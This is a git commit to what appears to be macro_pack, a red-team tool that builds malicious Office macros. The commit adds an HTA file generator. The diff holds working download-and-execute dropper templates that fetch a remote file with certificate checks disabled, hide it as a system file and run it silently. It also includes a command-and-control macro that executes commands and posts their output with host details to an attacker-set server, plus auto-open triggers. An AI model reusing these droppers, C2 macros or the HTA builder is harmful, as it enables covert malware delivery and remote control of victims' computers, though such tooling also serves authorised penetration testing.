Add HTA file generation

sevagas · sevagas · commit 8b96f99bdc2c · 2017-11-19T11:35:09.000+01:00
diff --git a/resources/community/cmd.vba b/resources/community/cmd.vba
@@ -40,15 +40,15 @@ End Function
 Private Function GetId() As String
     Dim myInfo As String
     Dim myID As String
-    myID = Environ("COMPUTERNAME") & " " & Environ("OS") & " " & Environ("PROCESSOR_IDENTIFIER")
+    myID = Environ("COMPUTERNAME") & " " & Environ("OS") 
     GetId = myID
 End Function
 
 'To send response for command'
 Private Function SendResponse(cmdOutput)
     Dim data As String
     Dim response As String
-    data = "id=" & GetId & vbCrLf & "&cmdOutput=" & vbCrLf & cmdOutput
+    data = "id=" & GetId & "&cmdOutput=" & cmdOutput
     SendResponse = HttpPostData(serverUrl, data)
 End Function
 
diff --git a/resources/community/dropper.vba b/resources/community/dropper.vba
@@ -22,7 +22,7 @@ Private Sub DownloadAndExecute()
         oStream.Write WinHttpReq.ResponseBody
         oStream.SaveToFile downloadPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
         oStream.Close
-        result = Shell(downloadPath, 0) ' vbHide = 0
+        CreateObject("WScript.Shell").Run downloadPath, 0
     End If    
     
 End Sub
diff --git a/resources/community/dropper2.vba b/resources/community/dropper2.vba
@@ -28,7 +28,8 @@ Private Sub DownloadAndExecute()
             oStream.SaveToFile downloadPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
             oStream.Close
             SetAttr downloadPath, vbReadOnly + vbHidden + vbSystem
-            result = Shell(downloadPath, 0) ' vbHide = 0
+            'result = Shell(downloadPath, 0) ' vbHide = 0
+            CreateObject("WScript.Shell").Run downloadPath, 0
         End If
        
     End If
diff --git a/src/common/help.py b/src/common/help.py
@@ -141,8 +141,8 @@ def printUsage(banner, currentApp, mpSession):
         Help for template usage: %s -t help
          
     -G, --generated=OUTPUT_FILE_PATH. Generates a file containing the macro. Will guess the format based on extension.
-        Supported extensions are: vba, doc, docm, docx, xls, xlsm, pptm.
-        Note: Apart from vba which is a text files, all other extension requires Windows OS with genuine MS Office installed.
+        Supported extensions are: vba, hta, doc, docm, docx, xls, xlsm, pptm.
+        Note: Apart from vba and hta which are text files, all other extension requires Windows OS with genuine MS Office installed.
     
     --dde \t Dynamic Data Exchange attack mode. Input will be inserted as a cmd command and executed via DDE
          DDE attack mode is not compatible with VBA Macro related options.
diff --git a/src/common/templates.py b/src/common/templates.py
@@ -3,26 +3,18 @@
 
 HELLO = \
 """
-Private Sub toto()
+Private Sub Hello()
     MsgBox "Hello from <<<TEMPLATE>>>" & vbCrLf & "Remember to always be careful when you enable MS Office macros." & vbCrLf & "Have a nice day!"
 End Sub
 
-Private Sub testMacroXl()
-    Application.Run "ThisWorkbook.toto"
-End Sub
-
-Private Sub testMacroWd()
-    toto
-End Sub
-
 ' triggered when Word/PowerPoint generator is used 
 Sub AutoOpen()
-    testMacroWd
+    Hello
 End Sub
 
 ' triggered when Excel generator is used
 Sub Workbook_Open()
-    testMacroXl
+    Hello
 End Sub
 """
 
@@ -40,7 +32,7 @@
     myURL = "<<<TEMPLATE>>>"
     downloadPath = "<<<TEMPLATE>>>"
     
-    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
+    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
     WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
     WinHttpReq.Open "GET", myURL, False ', "username", "password"
     WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
@@ -53,7 +45,8 @@
         oStream.Write WinHttpReq.ResponseBody
         oStream.SaveToFile downloadPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
         oStream.Close
-        result = Shell(downloadPath, 0) ' vbHide = 0
+        CreateObject("WScript.Shell").Run downloadPath, 0
+        'result = Shell(downloadPath, 0) ' vbHide = 0
     End If    
     
 End Sub
@@ -83,7 +76,7 @@
     downloadPath = "<<<TEMPLATE>>>"
     
     If Dir(downloadPath, vbHidden + vbSystem) = "" Then
-        Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
+        Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
         WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
         WinHttpReq.Open "GET", myURL, False ', "username", "password"
         WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
@@ -98,7 +91,7 @@
             oStream.SaveToFile downloadPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
             oStream.Close
             SetAttr downloadPath, vbReadOnly + vbHidden + vbSystem
-            result = Shell(downloadPath, 0) ' vbHide = 0
+            CreateObject("WScript.Shell").Run downloadPath, 0
         End If
        
     End If
@@ -516,7 +509,8 @@
     Call writeBytes(outFile, decode)
     
     Dim retVal
-    retVal = Shell(outFile, 0)
+    'retVal = Shell(outFile, 0)
+    retVal = CreateObject("WScript.Shell").Run outFile, 0
 End Sub
 
 
@@ -549,8 +543,8 @@
 Private Sub Main()
     Dim msg As String
     serverUrl = "<<<TEMPLATE>>>"
-       msg = "<<<TEMPLATE>>>"
-       On Error GoTo byebye
+    msg = "<<<TEMPLATE>>>"
+    On Error GoTo byebye
     msg = PlayCmd(msg)
     SendResponse msg
     On Error GoTo 0
@@ -577,15 +571,15 @@
 Private Function GetId() As String
     Dim myInfo As String
     Dim myID As String
-    myID = Environ("COMPUTERNAME") & " " & Environ("OS") & " " & Environ("PROCESSOR_IDENTIFIER")
+    myID = Environ("COMPUTERNAME") & " " & Environ("OS")
     GetId = myID
 End Function
 
 'To send response for command'
 Private Function SendResponse(cmdOutput)
     Dim data As String
     Dim response As String
-    data = "id=" & GetId & vbCrLf & "&cmdOutput=" & vbCrLf & cmdOutput
+    data = "id=" & GetId  & "&cmdOutput=" & cmdOutput
     SendResponse = HttpPostData(serverUrl, data)
 End Function
 
diff --git a/src/common/utils.py b/src/common/utils.py
@@ -47,8 +47,10 @@ class MSTypes():
     WD97="Word97"
     PPT="PowerPoint"
     PPT97="PowerPoint97"
+    MPP = "MSProject"
     PUB="Publisher"
     VBA="VBA"
+    HTA="HTA"
     UNKNOWN = "Unknown"
     
     @classmethod
@@ -64,6 +66,10 @@ def guessApplicationType(self, documentPath):
             result = self.WD97
         elif ".docx" ==  extension or extension == ".docm":
             result = self.WD
+        elif ".hta" ==  extension:
+            result = self.HTA
+        elif ".mpp" ==  extension:
+            result = self.MPP
         elif ".ppt" ==  extension:
             result = self.PPT97
         elif ".pptm" ==  extension or extension == ".pptx":
diff --git a/src/macro_pack.py b/src/macro_pack.py
@@ -12,8 +12,10 @@
 from modules.excel_gen import ExcelGenerator
 from modules.word_gen import WordGenerator
 from modules.ppt_gen import PowerPointGenerator
+from modules.msproject_gen import MSProjectGenerator
 from modules.template_gen import TemplateToVba
 from modules.vba_gen import VBAGenerator
+from modules.hta_gen import HTAGenerator
 from modules.word_dde import WordDDE
 from modules.com_run import ComGenerator
 from modules.listen_server import ListenServer
@@ -292,6 +294,9 @@ def main(argv):
                 elif MSTypes.PPT in mpSession.outputFileType:
                     generator = PowerPointGenerator(mpSession)
                     generator.run()
+                elif MSTypes.MPP == mpSession.outputFileType:
+                    generator = MSProjectGenerator(mpSession)
+                    generator.run()
                 elif MSTypes.PUB == mpSession.outputFileType and MP_TYPE == "Pro":
                     generator = PublisherGenerator(mpSession)
                     generator.run()
@@ -337,6 +342,10 @@ def main(argv):
                 generator = DcomGenerator(mpSession)
                 generator.run()
     
+        if mpSession.outputFileType == MSTypes.HTA:
+            generator = HTAGenerator(mpSession)
+            generator.run()
+    
         if mpSession.outputFileType == MSTypes.VBA or mpSession.outputFilePath == None:
             generator = VBAGenerator(mpSession)
             generator.run()
diff --git a/src/modules/hta_gen.py b/src/modules/hta_gen.py
@@ -0,0 +1,108 @@
+#!/usr/bin/env python
+# encoding: utf-8
+
+import logging
+from modules.mp_module import MpModule
+import re
+
+HTA_TEMPLATE = \
+r"""
+<!DOCTYPE html>
+<html>
+<head>
+<HTA:APPLICATION />
+<script type="text/vbscript">
+<<<VBS>>>
+<<<MAIN>>>
+Close
+</script>
+</head>
+<body>
+</body>
+</html>
+
+"""
+
+class HTAGenerator(MpModule):
+    """ Module used to generate HTA file from working dir content"""
+    
+    def vbScriptCheck(self):
+        logging.info("   [-] Check if VBA->VBScript is possible...")
+        # Check nb of source file
+        if len(self.getVBAFiles())>1:
+            logging.info("   [-] This module cannot handle more than one VBA file. Abort!")
+            return False
+        
+        f = open(self.getMainVBAFile())
+        content = f.readlines()
+        f.close()
+        # Check there are no call to Application object
+        for line in content:
+            if line.find("Application.") != -1:
+                logging.info("   [-] You cannot access Application object in VBScript. Abort!")
+                return False  
+        
+        # Check there are no DLL import
+        for line in content:
+            matchObj = re.match( r'.*(Sub|Function)\s*([a-zA-Z0-9_]+)\s*Lib\s*"(.+)"\s*.*', line, re.M|re.I) 
+            if matchObj:
+                logging.info("   [-] VBScript does not support DLL import. Abort!")
+                return False 
+        return True
+    
+    
+    def vbScriptConvert(self):
+        logging.info("   [-] Convert VBA to VBScript...")
+        translators = [("Val(","CInt("),(" Chr$"," Chr"),(" Mid$"," Mid"),("On Error","//On Error"),("byebye:",""), ("Next ", "Next //")]
+        translators.extend([(" As String"," "),(" As Object"," "),(" As Long"," "),(" As Integer"," ")])
+        f = open(self.getMainVBAFile())
+        content = f.readlines()
+        f.close()
+        isUsingEnviron = False
+        for n,line in enumerate(content):
+            # Do easy translations
+            for translator in translators:
+                line = line.replace(translator[0],translator[1])
+            
+            # Check if ENVIRON is used
+            if line.find("Environ(")!= -1:
+                isUsingEnviron = True
+                line = re.sub('Environ\("([A-Z_]+)"\)',r'wshShell.ExpandEnvironmentStrings( "%\1%" )' , line, flags=re.I)
+            content[n] = line
+            # ENVIRON("COMPUTERNAME") ->   
+            #Set wshShell = CreateObject( "WScript.Shell" )
+            #strComputerName = wshShell.ExpandEnvironmentStrings( "%COMPUTERNAME%" )
+        
+        # Write in new VBS file
+        f = open(self.getMainVBAFile()+".vbs", 'a')
+        if isUsingEnviron:
+            f.write('Set wshShell = CreateObject( "WScript.Shell" )\n')
+        f.writelines(content)
+        f.close()
+        
+        
+    def genHTA(self):
+        logging.info("   [-] Generating HTA file...")
+        f = open(self.getMainVBAFile()+".vbs")
+        vbsContent = f.read()
+        f.close()
+        # Write VBS in template
+        htaContent = HTA_TEMPLATE
+        htaContent = htaContent.replace("<<<VBS>>>", vbsContent)
+        htaContent = htaContent.replace("<<<MAIN>>>", self.startFunction)
+        # Write in new HTA file
+        f = open(self.outputFilePath, 'w')
+        f.writelines(htaContent)
+        f.close()
+        logging.info("   [-] Generated HTA file: %s" % self.outputFilePath)
+        
+    
+    def run(self):
+        logging.info(" [+] Generating HTA file from VBA...")
+        if not self.vbScriptCheck():
+            return 
+        self.vbScriptConvert()
+        self.genHTA()
+        
+        
+        
diff --git a/src/modules/listen_server.py b/src/modules/listen_server.py
@@ -66,7 +66,7 @@ def answer():
     """ called by bot when responding to command """
     clientId = request.form['id']
     cmdOutput = request.form['cmdOutput']
-    logging.info("   [-] %s: %s " % (clientId,cmdOutput))
+    logging.info("   [-] From %s received:\n %s " % (clientId,cmdOutput))
     return make_response("OK")
 
 
@@ -91,7 +91,7 @@ def upload():
 @secure_http_response
 def download(filename):
     
-    uploads = os.path.join(os.path.dirname(getRunningApp()) , webapp.config['UPLOAD_FOLDER']) #@UndefinedVariable
+    uploads = os.path.dirname(getRunningApp()) 
     logging.info("   [-] Sending file: %s" % (os.path.join(uploads,filename)))
     return send_from_directory(directory=uploads, filename=filename)
 
diff --git a/src/modules/msproject_gen.py b/src/modules/msproject_gen.py
diff --git a/src/modules/vba_gen.py b/src/modules/vba_gen.py
